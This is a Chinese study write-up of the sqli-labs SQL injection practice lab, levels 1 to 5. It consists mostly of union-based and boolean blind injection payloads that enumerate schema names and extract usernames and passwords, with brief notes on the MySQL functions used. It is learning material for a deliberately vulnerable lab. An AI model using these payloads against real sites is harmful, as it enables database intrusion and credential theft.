使用sqli-labs本地靶场,配置本地靶场需要注意的问题:
1. 判断注入点和注入类型
单引号报错 ?id=-1' --+
2. 查字段个数
?id=1' order by 4--+
3. 判断显示位
?id=-1' union select 1,2,3 --+
4. 查库
-1' union select 1,2,database()--+
5. 查表
-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
6. 查列
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+
7. 查内容
-1' union select 1,group_concat(username),3 from security.users --+
-1' union select 1,group_concat(username),group_concat(password) from users --+
order by 3正常,order by 4报错,则存在三个字段
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
爆出表名:emails,referers,uagents,users
选择一个表,users
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+
?id=-1' union select 1,group_concat(username),group_concat(password) from security.users --+
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+
?id=-1 union select 1,group_concat(username),group_concat(password) from security.users --+
ps:
在实验过程中,发现双引号也可以闭合,但是执行后续命令失败,应该是语句判别时不太对。
查看对应的sql语句能明显知道这一关是 ') 去闭合。
Less-3/?id=-1') union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+
Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+
双引号+括号可以闭合
分析源代码:
对输入的 id 添加了双引号,执行语句里又添加了括号
Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+
Less-4/?id=-1") union select 1,group_concat(username),group_concat(password) from security.users --+
第五关参考:https://blog.csdn.net/Fly_hps/article/details/80247032
测试数据库版本:
/Less-5/?id=1' and left(version(),1)=5 --+
查看一下version(),数据库的版本号为5.3,这里的这句话的意思是看看版本号的第一位是否是5,很明显返回的结果是正确的。
测试数据库长度
Less-5/?id=1' and length(database())=8--+
测试库名的第一位
Less-5/?id=1' and left(database(),1)>'a'--+
Less-5/?id=1' and left(database(),1)='s'--+
测试库名的前两位
Less-5/?id=1' and left(database(),2)='se'--+
...
经过测试大于、小于之后,我们最后可以用 等于 确定数据库的第一位是 s
ps:
在我们不知情的情况下,我们可以使用二分法来提高注入效率
之后的判断都是一样的,依次猜解就好,只需要修改left(a,b)中b的位置(该位置决定从哪个位置开始判断测试)。
最终测试出数据库的名字为 security
获取security数据库的第一个表的第一个字符:
/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1,1))>100 --+
/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1,1))=101 --+
可以通过修改substr(str,start,length)中的第二个参数“start”来猜解第一个表的第二个字符的内容。
猜测第二个表的名称,可以通过limit start,length来实现,通过修改start的值,来实现对第二个参数的获取与测试。
/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>100--+
第一个表:
经测试,数据库的第一个表的第一个字符为 e
第二个表:
经过测试,我们可以确定数据库名称为security,而且数据库中存在user表。
Less-5/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us[a-z]' limit 0,1)--+
Less-5/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^username' limit 0,1)--+
确定该user表中存在us****的列
确定存在列username
获取user表中username中第一行的第一个字符的ascii:
/Less-5/?id=1' and ord(mid((select IFNULL(cast(username as char),0x20)from security.users order by id limit 0,1),1,1))=68--+
cast(username as char)将username转换成char类型,
注意这里是cast函数( 语法:cast(字段名 as 转换的类型 ) )
ifnull(expr1,expr2)函数的语法为如果 expr1 不是null,ifnull() 返回 expr1,否则它返回 expr2。
0x20是空格的ascii码的十六进制表示。
mid()函数截取字符串一部分,mid(str,start,length)从位置start开始,截取str字符串的length位。
ord()函数同ascii(),将字符转为ascii值
报错注入
盲注有点痛苦,报错之后空了再来写吧